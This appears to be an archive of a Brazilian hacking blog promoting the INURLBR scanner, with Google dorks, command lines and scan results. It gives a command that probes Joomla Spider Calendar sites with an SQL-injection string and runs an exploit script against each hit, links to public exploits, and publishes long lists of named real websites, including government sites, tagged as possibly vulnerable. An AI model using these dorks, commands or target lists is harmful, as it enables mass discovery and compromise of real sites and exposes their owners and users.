Google INURL - Brasil: SCANNER INURLBR TERMINAL

Mostrando postagens com marcador SCANNER INURLBR TERMINAL. Mostrar todas as postagens

sexta-feira, 19 de setembro de 2014

SCANNER INURLBR + Exploit Vulnerability Joomla Plugin Calendar

0xSCAN + EXPLOIT

----------------------------------------------------------------------------------------------------------

0x[+] Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
0x[+] Exploit Author : Claudio Viviani
0x[+] Vendor Homepage : http://web-dorado.com/
0x[+] Software: http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329

Date : 2014-08-31
0x[+] Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox

------------------------------------------------------------------------------------------------

0xDORK[0]: inurl:option=com_spidercalendar
0xDORK[1]: intext:com_spidercalendar & intext:"index of"
0xDORK[2]: inurl:php & inurl:com_spidercalendar

0xVÍDEO[0]

0xVÍDEO[1]

0xCOMANDO INURLBR EXEMPLO={

./inurlbr.php --dork 'inurl:index.php?option=com_spidercalendar' -s joomla.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'0x27" --command-vul "python exploit/Joomla/joomla-calendar.py -H http://_TARGET_/"

}

0xSCRIPT INURLBR = {

https://github.com/googleinurl/SCANNER-INURLBR

}

0xEXPLOIT Joomla Plugin Calendar = {

http://1337day.com/exploit/22603

}

terça-feira, 13 de maio de 2014

Procurando site com Simple PHP Blog usando scanner inurl

Simple PHP Blog <= 0.4.0 - Multiple Remote Exploits,
Vamos usar o scanner inurl para buscar site que possuem o CMS Simple PHP Blog

[ SCANNER INURLBR 1.0 / CONSOLE ]

----------------------------------------------------------------------------------------------------------------------------
0xHOST GOOGLE........: www.google.com.br
0xDORK...............: intext:"Powered by Simple PHP Blog" & inurl:"/blog/" ext:php
0xEXPLOIT............:
0xARQUIVO............: resultado.txt
0xTIPO DE ERRO.......: 2
0xPROCURAR NO ALVO...: Simple PHP Blog
0xIP PROXY...........:
0xPORTA..............:
----------------------------------------------------------------------------------------------------------------------------
0xCARREGANDO CONFIGURAÇÕES...
DEBUG:

Array
(
    [0] => Array
        (
        )

    [host] => www.google.com.br
    [dork] => intext%3A%22Powered+by+Simple+PHP+Blog%22+%26+inurl%3A%22%2Fblog%2F%22+ext%3Aphp
    [arquivo] => resultado.txt
    [tipoerro] => 2
    [exploit] =>
    [achar] => Simple PHP Blog
    [ipProxy] =>
    [porta] =>
    [url] => /search?q=intext%3A%22Powered+by+Simple+PHP+Blog%22+%26+inurl%3A%22%2Fblog%2F%22+ext%3Aphp&num=1900&btnG=Search
    [port] => 80
)

Comando usado no scanner inurl:
php botConsole.php --host='www.google.com.br' --dork='intext:"Powered by Simple PHP Blog" & inurl:"/blog/" ext:php' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Simple PHP Blog'

ou --achar='Powered by Simple PHP Blog'

Exploit: http://www.exploit-db.com/exploits/1191/

Scanner INURL: http://pastebin.com/TzijC99y

RESULTADO SCANNER POSSÍVEIS VULNERÁVEIS :
TOTAL DE URL's: 179
EXPLOIT USADO:
DORK: intext%3A%22Powered+by+Simple+PHP+Blog%22+%26+inurl%3A%22%2Fblog%2F%22+ext%3Aphp
TOTAL DE POSSÍVEIS VULL: 106
ARQUIVO COM RESULTADO:resultado.txt
LISTA:

http://www.mutualdata.com/blog/index.php
http://www.ashrealms.com/blog/index.php
http://www.gdaa.org.uk/Blog/index.php
http://www.damanicorp.com/blog/index.php?m=10&y=13&entry=entry131012-001437
http://www.damanicorp.com/blog/index.php?m=04&y=07
http://www.traffordbankguesthouse.co.uk/blog/index.php
http://ps.ewi.utwente.nl/Blog/index.php
http://www.aerobiology.ca/blog/index.php
www.aerobiology.ca/blog/index.php
http://www.lofiminds.com/blog/static.php?page=xwung
http://fourseasonsroofingandsiding.com/Roofing-Blog/index.php?category=13
http://www.homesurvey.eu/Blog/index.php
http://www.omegamoon.com/blog/index.php
www.omegamoon.com/blog/index.php
http://www.omegamoon.com/blog/index.php?entry=entry140317-173710
http://boeglin.org/blog/index.php?entry=Flashing-a-BenQ-Z-series-for-free
http://humblecomics.com/blog/index.php
http://www.northernkentuckydancestudio.com/blog/index.php
http://www.ablekidspress.com/blog/index.php
www.ablekidspress.com/blog/index.php
http://courtjones.com/blog/index.php
http://geneyang.com/blog/index.php?entry=entry100524-195255
http://blog.frapu.de/index.php?m=09&y=13&d=&entry=entry130901-200909
http://www.lfpl.org/readers/blog/index.php
www.lfpl.org/readers/blog/index.php
http://shalinsiriwardana.asia/blog/comments.php?y=14&m=01&entry=entry140126-160857
http://www.z80.eu/blog/index.php?entry=entry140316-002012
http://www.rimrockpress.com/blog/index.php?entry=entry110914-115350
www.rimrockpress.com/blog/index.php?entry=entry110914-115350
http://blog.curti.eti.br/stats.php
http://www.donaldsteel.com/blog/index.php
http://www.bbheits.com/blog/index.php
http://www.lautechaee-edu.com/blog/index.php
http://www.bedfordlodge.co.uk/blog.php
www.bedfordlodge.co.uk/
http://www.bignightout.net.nz/blog/index.php?m=11&y=11&entry=entry111120-182043
http://www.createdimage.com.au/blog/index.php?m=01&y=14
http://www.bonniwellmusicmachine.com/blog/static.php?page=MusicMachineVideoBiography
www.bonniwellmusicmachine.com/blog/static.php?page=MusicMachineVideoBiography
http://www.invernessfestivals.com/winter08/blog/index.php?entry=entry131215-100334
www.invernessfestivals.com/winter08/blog/index.php?entry=entry131215-100334
http://www.pluhma.com/blog/index.php?entry=entry000101-205059
http://pdos.csail.mit.edu/scigen/blog/index.php?m=02&y=06
http://www.custom-designbuild.com/blog/index.php?m=02&y=14&entry=entry140215-082241
http://www.masetti.net/blog/archives.php?y=09&m=06
http://www.eliteenglishcentre.es/blog/static.php?page=Welcome
http://blog.hakwerk.com/static.php?page=crazy_it_party
http://www.wetieit.com/blog/index.php?category=1
www.wetieit.com/blog/index.php?category=1
http://theheatersonline.com/blog/index.php
http://fortknox.csc.ncsu.edu/blog/index.php?m=04&y=07&entry=entry070412-140344
http://blog.shuva.in/static.php?page=static070901-005017_about_me
http://www.belgianfamily.com/blog/index.php
http://www.wd5aii.com/blog/index.php?y=13&m=12
http://www.maintsmart.com/Blog/index.php
http://karrkrafts.com/blog/index.php
http://www.pinecountyhistorymuseum.org/blog/index.php
http://william.famille-blum.org/blog/index.php?entry=entry080612-040012
http://www.xandrinho.com/blog/index.php?entry=entry100528-155648
http://www.sbcofficecenter.com/blog/index.php
http://www.soundbysinger.com/audio-blog/index.php
www.soundbysinger.com/audio-blog/index.php
http://www.statetheatreconcerts.com/blog/static.php?page=static100613-122412
www.statetheatreconcerts.com/blog/static.php?page=static100613-122412
http://www.tapestry.co.nz/blog/index.php?entry=entry140123-215640
http://www.serpentbox.com/blog/index.php
http://www.cam-dex.com/blog/index.php
www.cam-dex.com/blog/index.php
http://www.ocsunsetmarina.com/blog/index.php?entry=entry070904-151350
http://www.arrowpipeline.com/blog/index.php?m=12&y=08&entry=entry081221-162738
http://www.africatamed.co.za/blog/comments.php?y=07&m=07&entry=entry070719-153213
http://www.thevacationcalendar.com/Blog/index.php?entry=entry090727-205943
http://www.judocoach.com/blog/index.php?entry=entry130829-103325
www.judocoach.com/blog/index.php?entry=entry130829-103325
http://www.ghostsniper.com/blog/index.php?entry=entry060828-222950
http://www.terraformthemoon.com/blog/index.php?entry=entry110412-005014
http://www.freshstartkz.com/blog/archives.php?y=14&m=03
http://www.freshstartkz.com/blog/archives.php?y=13&m=08
http://www.chrome-lagos.com/blog/index.php?m=10&y=11&entry=entry111010-192213
http://wsanders.net/blog/static.php?page=static070527-095119
http://www.zealsoft.com/blog/index.php?entry=entry051124-083423
http://wiels.nl/blog/index.php
http://www.patopowerparts.com/blog/index.php
http://www.milfordsnowtrekkers.com/blog/index.php
http://www.anglecomm.com/blog/index.php?entry=entry070510-172648
http://www.balishevilla.com/blog/index.php
http://www.asa-houston.org/Projects/Blog-CE/index.php
http://patrickbrennan.net/blog/index.php
http://millerfit.com/blog/index.php
http://www.redkid.net/blog/index.php?entry=entry101111-142242
http://www.och.cc/blog/stats.php
http://mammoth395.com/blog/index.php?entry=entry140213-130501
http://www.kellysheridan.ca/blog/index.php?m=01&y=10
http://www.parkburnguesthouse.co.uk/blog/index.php
http://www.bestpracticesfhc.com/blog/index.php
http://www.emillustration.co.uk/blog/index.php?m=03&y=13&entry=entry130308-180819
http://blog.chinookhelicopters.com/index.php?entry=entry140130-100830
http://www.waltzinghorsefarm.com/blog/index.php
http://www.colonsaybrewery.co.uk/blog/index.php?PHPSESSID=c8cd4e5ca92b1e8b479778772898556f
www.colonsaybrewery.co.uk/blog/index.php?PHPSESSID=c8cd4e5ca92b1e8b479778772898556f
http://www.djdingo.com/blog/contact.php
http://playchesster.com/blog/index.php?entry=entry110914-231540
http://www.nautikites.net/blog/index.php?entry=entry140118-112029
http://berman.nu/blog/index.php?entry=entry080428-235550
http://www.bazayev.com/blog/index.php?entry=entry120327-124716
http://www.bootcampbeach.co.uk/blog/static.php?page=static090501-130242

sexta-feira, 9 de maio de 2014

Procurando warning de erro usando scanner inurl.

Procurar avisos warning mysql dentro de sites .br excluindo resultados não interessantes como forum's e tutoriais.

DORK: site:br intext:"warning: mysql_fetch_array();" -forum -vivaolinux -tutorial -Fórum

- Usando o scanner INURL -

php botConsole.php --host='www.google.com.br' --dork='site:br intext:"warning: mysql_fetch_array();" -forum -vivaolinux -tutorial -Fórum' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Warning'

--host='define por qual host do google vai sair a busca, no caso é o .com.br, mas pode ser qualquer outro.
Para ver a lista de host do google digite 'php botConsole.php hosts'.'

--dork='define a dork que vai efetuar sua busca'

--arquivo='define o arquivo de saída onda vai ser salvo seu resultado'

--tipoerro=' 2 define o tipo de busca, tipo dois sanguifica que o script vai validar se é vull ou não, caso ele achar a string passada no comando --achar, se tal informação for encontrada dentro do alvo o site é possivelmente vul'

--exploit='define o que vai ser concatenado a cada url para o script ser executado, Ex: se você deseja executar um sql-exploit no final de cada url, e o script procurar por determinado erro ou msg ,nesse exemplo está vazio pois não tinha necessidade de exploitar os alvos, pois os mesmos já carregavam o erros sql.'

--achar='define o que procurar dentro de cada alvo, ou seja código fonte.
neste exemplo estavamos procurando avisos de do mysql Warning que em html ficaria Warning'

Mais informações digite php botConsole.php ajuda

[ BAIXAR: http://pastebin.com/TzijC99y ]

RESULTADO:

SCANNER INURLBR 1.0 - [ blog.inurl.com.br ] /DATA:09/05/2014 10:14:52
/DORK: site%3Abr+intext%3A%22warning%3A+mysql_fetch_array%28%29%3B%22+-forum+-vivaolinux+-tutorial+-F%C3%B3rum /EXPLOIT: TOTAL VULL:116

http://www.cbt.esp.br/modulos/ssl/index.php?indice=128
www.cbt.esp.br/modulos/ssl/index.php?indice=128
www.cbt.esp.br/modulos/ssl/index.php?indice=128
http://www.itdata.com.br/products/index.php?location=product_view&product_area=featured&product_id=4
www.itdata.com.br/products/index.php?location...view...
http://www.epengenharia.com.br/texto-a22-mapa_do_site.html
www.epengenharia.com.br/texto-a22-mapa_do_site.html
http://www.ingesp.com.br/empreendimentos/unifamiliar-em-pinhalzinho-sc/43
www.ingesp.com.br/empreendimentos/unifamiliar-em...sc/43
http://www.dapo.com.br/obra.php?obr
www.dapo.com.br/obra.php?obr
http://www.marcosparente.net.br/?pg=gremio
www.marcosparente.net.br/?pg=gremio
http://www.faa.edu.br/vetmatriz.php
www.faa.edu.br/vetmatriz.php
http://www.softbest.com.br/pwn3ed/spotlights/artspotlight/detalhes-post/9/
www.softbest.com.br/pwn3ed/spotlights/artspotlight/detalhes.../9/
http://www.marciaimoveisrs.com.br/imovel.php?id=7
www.marciaimoveisrs.com.br/imovel.php?id=7
http://www.softbest.com.br/pwn3ed/404/
www.softbest.com.br/pwn3ed/404/
http://www.altogarcas.mt.gov.br/contaspublicas.php?tipo=7
www.altogarcas.mt.gov.br/contaspublicas.php?tipo=7
www.altogarcas.mt.gov.br/contaspublicas.php?tipo=7
www.acainews.com.br/.../b-ecirc-bada-eacute-presa-ap-oacute-s-fazer-sexo-
http://www.cpadnews.com.br/institucional/secao.php?s=3
www.cpadnews.com.br/institucional/secao.php?s=site%3Abr+intext%3A%22warning%3A+mysql_fetch_array%28%29%3B%22+-forum+-vivaolinux+-tutorial+-F%C3%B3rum 3
http://www.frcsolucoes.com.br/minidir/
www.frcsolucoes.com.br/minidir/
http://www.tuttydecoracoes.com.br/categoria-produtos.php?cat=2..
www.tuttydecoracoes.com.br/categoria-produtos.php?cat=2..
http://www.agricenterseberi.com.br/site/localizacao.php
www.agricenterseberi.com.br/site/localizacao.php
http://clinicacri.com.br/estrutura/enquetes/enquetes.php
http://www.autocentroimoveis.com.br/scherer/imovel.php?id=6051
www.autocentroimoveis.com.br/scherer/imovel.php?id=6051
www.ipm.org.br/ipmb_pagina.php?mpg=2.03.00.00.00...
http://www.eduardoimoveisrs.com.br/imovel.php?id=
www.eduardoimoveisrs.com.br/imovel.php?id=
http://www.cidadefmnavirai.com.br/template_3.php?id=rbatsifxx
www.cidadefmnavirai.com.br/template_3.php?id=rbatsifxx
http://www.cta.br/noticias/noticias.php
www.cta.br/noticias/noticias.php
http://www.makakomotorsports.com.br/?pagina=detalhes&cod=2
www.makakomotorsports.com.br/?pagina=detalhes
http://intranet.clicknet.net.br/modulos/administrativo/local_cobranca/16/index.php
http://www.podiumveiculos.com.br/fire/2014/veiculos-novos.php
www.podiumveiculos.com.br/fire/2014/veiculos-novos.php
http://www.exer.com.br/minidir/
www.exer.com.br/minidir/
http://www.imojel.com.br/include/ler_usina.php
www.imojel.com.br/include/ler_usina.php
http://www.imojel.com.br/include/ler_galeria-montanha.php
www.imojel.com.br/include/ler_galeria-montanha.php
http://www.imobestrela.com.br/imovel.php?id=
www.imobestrela.com.br/imovel.php?id=
http://www.ciadacasaimoveis.com.br/imovel.php?id=14223
www.ciadacasaimoveis.com.br/imovel.php?id=14223
www.saopedrodoparana.pr.gov.br/padrao.php?uid=MjU...
http://www.fiatviaverdi.com.br/semi-novo/fiat-500/42
www.fiatviaverdi.com.br/semi-novo/fiat-500/42
http://www.folhadearaputanga.com.br/index3.php?pg=evento&id=434
www.folhadearaputanga.com.br/index3.php?pg=evento
http://www.feierimoveis.com.br/imovel.php?id=7537
www.feierimoveis.com.br/imovel.php?id=7537
http://www.macrooffice.com.br/novo/animatopo_xml.php
www.macrooffice.com.br/novo/animatopo_xml.php
http://www.marcaprovada.com.br/site/consumidores/codigo.php
www.marcaprovada.com.br/site/consumidores/codigo.php
http://www.ogerente.com.br/novo/canais_colunas_all.php?es=c&canal=9&canallocal=30
http://www.guiadonoroeste.com.br/anuncie.php
www.guiadonoroeste.com.br/anuncie.php
http://marketlist.com.br/minidir/terceiro.php
http://www.bitfarma.com.br/minidir/
www.bitfarma.com.br/minidir/
http://www.tribunavgp.com.br/home/
www.tribunavgp.com.br/home/
http://www.crescer.inf.br/site/?ir=contato
www.crescer.inf.br/site/?ir=contato
http://www.banet.com.br/site/cadastro.php
www.banet.com.br/site/cadastro.php
http://www.praiagrandesp.com.br/exibe.php?id=182
www.praiagrandesp.com.br/exibe.php?id=182
http://www.pampulhamallshopping.com.br/?pg=lojas
www.pampulhamallshopping.com.br/?pg=lojas
www.pampulhamallshopping.com.br/?pg=lojas
http://www.birakimoveis.com.br/links_uteis.php
www.birakimoveis.com.br/links_uteis.php
http://www.autofuria.com.br/paginas/veiculo_info.php?veiculo=1
www.autofuria.com.br/paginas/veiculo_info.php?veiculo=1
http://www.astaritabazacas.com.br/?link=maquinas&produto=7
http://www.grupoacaoimoveis.com.br/index.php
www.grupoacaoimoveis.com.br/index.php
http://www.lincetoyota.com.br/acessorios/?carro_acessorio=%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20mysql_fetch_array
www.lincetoyota.com.br/acessorios/?carro_acessorio...
http://www.negocieimoveisrs.com.br/loja.php?id=711
www.negocieimoveisrs.com.br/loja.php?id=711
www.negocieimoveisrs.com.br/loja.php?id=711
http://www.portalubirata.com.br/guia/Floricultura/66664-Decorart_Floricultura.html
www.portalubirata.com.br/guia/.../66664-Decorart_Floricultura.html
http://www.tudoparasuaempresa.com.br/orcamento.php?codigo=63&
www.tudoparasuaempresa.com.br/orcamento.php?codigo=63
http://www.camarapotim.sp.gov.br/sessoes/indice-ordinarias.php
http://www.mcsmecanica.com.br/index.php
www.mcsmecanica.com.br/index.php
http://imobiliariagaleao.com.br/pesq_refinada/indexformpesqrefinada.php
http://fluirpilates.com.br/equipePessoa.php?id=4
http://imoveissponline.com.br/parceiros.php
http://intranet.vcnet.com.br/modulos/administrativo/local_cobranca/38/index.php
http://www.perfininvestimentos.com.br/fundos/perfin-ls-plus-fic-fim.htm
www.perfininvestimentos.com.br/fundos/perfin-ls-plus-fic-fim.htm
www.tripliceeventos.com.br/tclass/index.php?opt=in
http://www.quibusca.com.br/produto.php?idprod=
www.quibusca.com.br/produto.php?idprod=
http://www.delamarveiculos.com.br/motos_usadas.php
www.delamarveiculos.com.br/motos_usadas.php

quarta-feira, 27 de novembro de 2013

[ SCANNER INURLBR / TERMINAL. ]

Mais uma ferramenta para os dorkeiros de plantão.

* SCANNER INURLBR 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permissão Leitura & Escrita
* BUSCA POSSÍVEIS VULNERABILIDADES
* SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
* OPÇÕES PARA SETAR PROXY.
* MUDAR O MOTOR DE BUSCA GOOGLE 202 DISPONÍVEIS.
* SETAR EXPLOIT.
* PERSONALIZAR PROCURA DE ERROS DENTRO DE CADA URL ENCONTRADA.
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br

--host='www.google.com.br'
--dork='sua dork'
--arquivo='seusResultados.txt'
--tipoerro='1 ou 2'
--exploit='O que vai ser injetado no final de cada url'
--achar='Funciona com Tipoerro 2 para procurar strings personalizadas em cada URL'
--ipproxy='IP PROXY EX: 172.16.0.150'
--porta='PORTA do proxy'

O PARÂMETRO --tipoerro tem duas opções:
1 - O Scanner vai procurar erros padrões do script SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
O mesmo vinculado com seu EXPLOIT que pode ser deixado vazio --exploit='' o exploit sempre será usado no final das urls,Padrão básico
sqlinjection.
2 - Opção para personalizar sua execução onde é habilitado o parâmetro --achar='',Achar funciona para procurar sua definição dentro das urls encontradas.
Ex[1]: --achar='WordPress' isso vai procurar a palavra WordPress em todas urls encontradas pelo scanner.
Ex[2]: --tipoerro='2' --exploit='wp-login.php' --achar='WordPress'\r";

Exemplos de uso.
Comando:

php botConsole.php --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'

[ SCANNER INURLBR / TERMINAL. ] php botConsole.php --host='www.google.co.bw' --dork='site:br inurl:/wp-content/themes/ "Index of /"' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Index of'

Comando:
php botConsole.php ajuda

Comando:
php botConsole.php hosts

Baixar: https://code.google.com/p/scanner-inurl/

Páginas

Parceiro: Camisetas Hacker